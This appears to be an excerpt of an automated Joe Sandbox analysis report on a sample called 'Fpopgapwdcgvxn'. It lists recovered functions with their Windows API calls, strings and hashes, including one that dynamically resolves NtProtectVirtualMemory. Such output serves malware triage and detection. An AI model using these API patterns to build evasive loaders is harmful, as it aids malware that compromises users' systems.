                                                                                                    • Instruction ID: 3d2aa2c5d11aef641389a9d662e56c9b7015354b34e9df38f7bc3f92c9be7e80
                                                                                                    • Opcode Fuzzy Hash: 09a0eb2e90d0940743469b14d29b62871de0e21f44c11d650bcace88f7e3990f
                                                                                                    • Instruction Fuzzy Hash: CE11C665A187905ACF25FB784CE4B966B9C0F45311F0C06B5BA99EE2C7C7ECC588CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D3B78 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 032D3B90
                                                                                                    • GetDeviceCaps.GDI32(?,00000068), ref: 032D3BAC
                                                                                                    • GetPaletteEntries.GDI32(8A080D4D,00000000,00000008,?), ref: 032D3BC4
                                                                                                    • GetPaletteEntries.GDI32(8A080D4D,00000008,00000008,?), ref: 032D3BDC
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 032D3BF8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EntriesPalette$CapsDeviceRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 3128150645-0
                                                                                                    • Opcode ID: dff730e50a37138b46365172f4948773fbdfb32ddafa947573f435f1269dc94e
                                                                                                    • Instruction ID: 21a530a481e0779daa9ca647fd98e2dc05c28c92f4ad616b8984e03065263a6c
                                                                                                    • Opcode Fuzzy Hash: dff730e50a37138b46365172f4948773fbdfb32ddafa947573f435f1269dc94e
                                                                                                    • Instruction Fuzzy Hash: 651104356583087FEB44DAA4CC81FAD7BFCF704710F408095F614DA5C1DAB694848722
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BBB50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,032BBBE7,?,?,00000000), ref: 032BBB68
                                                                                                      • Part of subcall function 032BB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 032BB8E2
                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,032BBBE7,?,?,00000000), ref: 032BBB98
                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000BA9C,00000000,00000000,00000004), ref: 032BBBA3
                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,032BBBE7,?,?,00000000), ref: 032BBBC1
                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000BAD8,00000000,00000000,00000003), ref: 032BBBCC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                                                    • String ID:
                                                                                                    • API String ID: 4102113445-0
                                                                                                    • Opcode ID: b5ee29caf2315a73ee6f7af838c0e6f6ed615ba079f22fff948149f910dd6af2
                                                                                                    • Instruction ID: e418cd351779f776edc297f0ac74435fdadfb62777ce1dd90c57e2705f2b13ab
                                                                                                    • Opcode Fuzzy Hash: b5ee29caf2315a73ee6f7af838c0e6f6ed615ba079f22fff948149f910dd6af2
                                                                                                    • Instruction Fuzzy Hash: AC01F239A30744AFEA11F6688C12FDEB67CDB45790F6105A0F810EAAC4D6A59E808264
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03302588 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • UnhookWindowsHookEx.USER32(00000000), ref: 03302597
                                                                                                    • SetEvent.KERNEL32(00000000,03304DA2), ref: 033025B2
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 033025B7
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,03304DA2), ref: 033025CC
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,03304DA2), ref: 033025D7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2429646606-0
                                                                                                    • Opcode ID: f7b54ec33de260c23a229388da062d0c5e9fea09b393e5765e30bb2b6acfa47d
                                                                                                    • Instruction ID: 0f60140daa128be1a78171b84cfce4eba3cf5370d7a1f2b8f01939b5ade15c99
                                                                                                    • Opcode Fuzzy Hash: f7b54ec33de260c23a229388da062d0c5e9fea09b393e5765e30bb2b6acfa47d
                                                                                                    • Instruction Fuzzy Hash: DCF045756103009BCBA8FBF8E8D8A9A77ECE708351F08C915B15ACB589D7B494C0CF55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BBC00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,032BBDD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 032BBC2F
                                                                                                      • Part of subcall function 032BB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 032BB8E2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Locale$InfoThread
                                                                                                    • String ID: eeee$ggg$yyyy
                                                                                                    • API String ID: 4232894706-1253427255
                                                                                                    • Opcode ID: 72070016afa254f1bbbe1066e1da8560694116bcd9d1dbadafd0382206d63beb
                                                                                                    • Instruction ID: a70016df998bd33887235f8c2f44f2d529b3513cada0f99627e79f3e99a60e38
                                                                                                    • Opcode Fuzzy Hash: 72070016afa254f1bbbe1066e1da8560694116bcd9d1dbadafd0382206d63beb
                                                                                                    • Instruction Fuzzy Hash: 7F4126387342068BD711FA7AC8D12FEF2BADB813C0F580465D5A1CB356DBB8E9C58625
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032E34B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 032E34FE
                                                                                                    • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 032E3550
                                                                                                    • DrawMenuBar.USER32(00000000), ref: 032E355D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                    • String ID: P
                                                                                                    • API String ID: 3227129158-3110715001
                                                                                                    • Opcode ID: 74305f8d64f08ea439394f36a7110a67afc74df5902c083808bb8c0521228476
                                                                                                    • Instruction ID: 2d8f9541dee4ab67f55e4edb03719ad4e9a78d0e81b9c2a0cbd7ca4d32c88294
                                                                                                    • Opcode Fuzzy Hash: 74305f8d64f08ea439394f36a7110a67afc74df5902c083808bb8c0521228476
                                                                                                    • Instruction Fuzzy Hash: 42119174625301AFD311DB2CCC81B8ABAD9AF88365F588A68F1A5CB3D4D775C884C746
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032CFC1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 032CFC29
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032CFC2F
                                                                                                    Strings
                                                                                                    • NtProtectVirtualMemory, xrefs: 032CFC1F
                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 032CFC24
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                                    • API String ID: 1646373207-1386159242
                                                                                                    • Opcode ID: c0e5f333a9f5ecddbc65b5ad4665f3aa71611e5da3e37fa546e596a18f3af927
                                                                                                    • Instruction ID: 80f32928115158fdaf8d989e5c193cde5423419b4af9f1aaefc493fd0b05e42a
                                                                                                    • Opcode Fuzzy Hash: c0e5f333a9f5ecddbc65b5ad4665f3aa71611e5da3e37fa546e596a18f3af927
                                                                                                    • Instruction Fuzzy Hash: 80E0ECB6260349BFCB80EFACD985DCB3BFCAB1C760B004005BA19D7602C671E9919B71
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BD6A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0331910B,00000000,0331911E), ref: 032BD6A6
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 032BD6B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                    • API String ID: 1646373207-3712701948
                                                                                                    • Opcode ID: 6d13459986519e6025936792f54e17b7a25b5a8c519d4d66310f915227ca42aa
                                                                                                    • Instruction ID: 2b7301584b62a453f922d177980809db3147a61a0778524b264a9e34874685c3
                                                                                                    • Opcode Fuzzy Hash: 6d13459986519e6025936792f54e17b7a25b5a8c519d4d66310f915227ca42aa
                                                                                                    • Instruction Fuzzy Hash: 2CD052A023238A4FDA00FEA478C06C92AFCAB003A3F080525A41CAA20AC7F0C8C2C700
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032ED544 Relevance: 6.3, APIs: 4, Instructions: 308COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 032ED6C3
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 032ED6FE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4bf82abc7bfd78b7cf407fd1ca3a6fb92910d76b92e317fad021248613bc2848
                                                                                                    • Instruction ID: eeeceff764ee7e387e107842f48edce11407f652de4495044f676cbb05c283d5
                                                                                                    • Opcode Fuzzy Hash: 4bf82abc7bfd78b7cf407fd1ca3a6fb92910d76b92e317fad021248613bc2848
                                                                                                    • Instruction Fuzzy Hash: A7D16A74A04A0ADFDB11CF79C484BAABBF6FF49300F548958E4AA9B354C771E981CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032E80F8 Relevance: 6.2, APIs: 4, Instructions: 212COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 032E816D
                                                                                                    • GetDesktopWindow.USER32 ref: 032E829D
                                                                                                    • SetCursor.USER32(00000000), ref: 032E82F2
                                                                                                      • Part of subcall function 032F3C48: ImageList_EndDrag.COMCTL32(?,-00000010,032E82CD), ref: 032F3C64
                                                                                                    • SetCursor.USER32(00000000), ref: 032E82DD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CursorDesktopWindow$DragImageList_
                                                                                                    • String ID:
                                                                                                    • API String ID: 617806055-0
                                                                                                    • Opcode ID: ccb84be38efbd23f2fbf01f6d0d17f550798f3357e56ce7c6d3f617a51767382
                                                                                                    • Instruction ID: 5af976f6c6da1246be9d8f65a5a60adaa809c66be6758b1a7de92e12537ae67d
                                                                                                    • Opcode Fuzzy Hash: ccb84be38efbd23f2fbf01f6d0d17f550798f3357e56ce7c6d3f617a51767382
                                                                                                    • Instruction Fuzzy Hash: 6C915838650641CFC708EF28E2C5A5AB7E9FB95700F48C594E896AB36DC770EC85CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BF554 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 032BF603
                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 032BF61F
                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 032BF696
                                                                                                    • VariantClear.OLEAUT32(?), ref: 032BF6BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 920484758-0
                                                                                                    • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                    • Instruction ID: 2c7318cfb23a341698aadd3802a4b2efd30d813eb843b592ba93f5efceb38066
                                                                                                    • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                    • Instruction Fuzzy Hash: 1F41FA79A1171AAFCB61EF58CD90BC9B3BCAB08340F0441D5EA49E7211DA70AFC08F64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BBE3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 032BBE59
                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 032BBE7D
                                                                                                    • GetModuleFileNameA.KERNEL32(032B0000,?,00000105), ref: 032BBE98
                                                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 032BBF2E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3990497365-0
                                                                                                    • Opcode ID: e45f37306e2736e36fd61dce08079ee1cca931017b2d7d80e1c5139dcc2f2c69
                                                                                                    • Instruction ID: d391666d6ad76fda97e3896b760e8c7643be750eed368fe41221d24661a514c3
                                                                                                    • Opcode Fuzzy Hash: e45f37306e2736e36fd61dce08079ee1cca931017b2d7d80e1c5139dcc2f2c69
                                                                                                    • Instruction Fuzzy Hash: D0411E75A203589BDB21EB68CC84BDAB7FDAB18380F4440E9E508EB255D7B49FC48F50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032BBE3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 032BBE59
                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 032BBE7D
                                                                                                    • GetModuleFileNameA.KERNEL32(032B0000,?,00000105), ref: 032BBE98
                                                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 032BBF2E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3990497365-0
                                                                                                    • Opcode ID: 40d404f17392740e3f187c071d5243610341f93afebe17c0357a001cbe621a28
                                                                                                    • Instruction ID: ce0955a5847051dbc0fc6a9dfbd32fd1d468aebe31c2c23212dd3711792502a4
                                                                                                    • Opcode Fuzzy Hash: 40d404f17392740e3f187c071d5243610341f93afebe17c0357a001cbe621a28
                                                                                                    • Instruction Fuzzy Hash: BF410E75A203589BDB21EB68CC84BDAB7FD9B18380F4440E9E648EB255D7B49FC48F50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03301550 Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetKeyboardLayout.USER32(00000000), ref: 03301595
                                                                                                    • GetDC.USER32(00000000), ref: 033015EA
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 033015F4
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 033015FF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDeviceKeyboardLayoutRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 3331096196-0
                                                                                                    • Opcode ID: c5dfc0bf465cd0eb1a682daf3b5149ac52e2dd013a0625a89a988637131a29b4
                                                                                                    • Instruction ID: 01140b28368e21d9cd405e06e03a6a8a071e94abe1769b29e88b7bb0ba36d9ba
                                                                                                    • Opcode Fuzzy Hash: c5dfc0bf465cd0eb1a682daf3b5149ac52e2dd013a0625a89a988637131a29b4
                                                                                                    • Instruction Fuzzy Hash: 61311B78A203418FC350EF2DE8C4B897BE0AB04354F4581A9E918CF396DA72A8888B54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032D4CD4 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 032D2EA4: EnterCriticalSection.KERNEL32(033303A0,00000000,032D1856,00000000,032D18B5), ref: 032D2EAC
                                                                                                      • Part of subcall function 032D2EA4: LeaveCriticalSection.KERNEL32(033303A0,033303A0,00000000,032D1856,00000000,032D18B5), ref: 032D2EB9
                                                                                                      • Part of subcall function 032D2EA4: EnterCriticalSection.KERNEL32(00000038,033303A0,033303A0,00000000,032D1856,00000000,032D18B5), ref: 032D2EC2
                                                                                                      • Part of subcall function 032D6164: GetDC.USER32(00000000), ref: 032D61BA
                                                                                                      • Part of subcall function 032D6164: GetDeviceCaps.GDI32(00000000,0000000C), ref: 032D61CF
                                                                                                      • Part of subcall function 032D6164: GetDeviceCaps.GDI32(00000000,0000000E), ref: 032D61D9
                                                                                                      • Part of subcall function 032D6164: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,032D4D27,00000000,032D4DB3), ref: 032D61FD
                                                                                                      • Part of subcall function 032D6164: ReleaseDC.USER32(00000000,00000000), ref: 032D6208
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 032D4D29
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 032D4D42
                                                                                                    • SelectPalette.GDI32(00000000,?,000000FF), ref: 032D4D6B
                                                                                                    • RealizePalette.GDI32(00000000), ref: 032D4D77
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 979337279-0
                                                                                                    • Opcode ID: 541a7faedb366d2d7d279f77699589103b85686cdf4311b556dac4f4c7626d03
                                                                                                    • Instruction ID: a8e0c1b094afa86368073c92ea560c594e39e0643a5d8fd078ea59f24f2fdeaa
                                                                                                    • Opcode Fuzzy Hash: 541a7faedb366d2d7d279f77699589103b85686cdf4311b556dac4f4c7626d03
                                                                                                    • Instruction Fuzzy Hash: 2D310878A24658EFDB04EF59C980D9DB7F5FF48720B6641A1E804AB325CB70EE80DB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032E3B74 Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetMenuState.USER32(?,?,?), ref: 032E3B97
                                                                                                    • GetSubMenu.USER32(?,?), ref: 032E3BA2
                                                                                                    • GetMenuItemID.USER32(?,?), ref: 032E3BBB
                                                                                                    • GetMenuStringA.USER32(?,?,?,?,?), ref: 032E3C0E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$ItemStateString
                                                                                                    • String ID:
                                                                                                    • API String ID: 306270399-0
                                                                                                    • Opcode ID: 54f3821aab6b08e110c834414f742b6a46e56fe4077df6f6e249ed6f5472aa0a
                                                                                                    • Instruction ID: 2d26909e68c0a2c56f5fce9f620d4bc0ede7b652c7a03573f92e480937eab570
                                                                                                    • Opcode Fuzzy Hash: 54f3821aab6b08e110c834414f742b6a46e56fe4077df6f6e249ed6f5472aa0a
